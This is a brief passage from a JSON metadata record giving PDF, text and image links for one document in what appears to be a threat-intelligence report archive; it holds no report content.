"https://archive.orkl.eu/0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac.pdf", "text": "https://archive.orkl.eu/0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac.txt", "img": "https://archive.orkl.eu/0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac.jpg" } }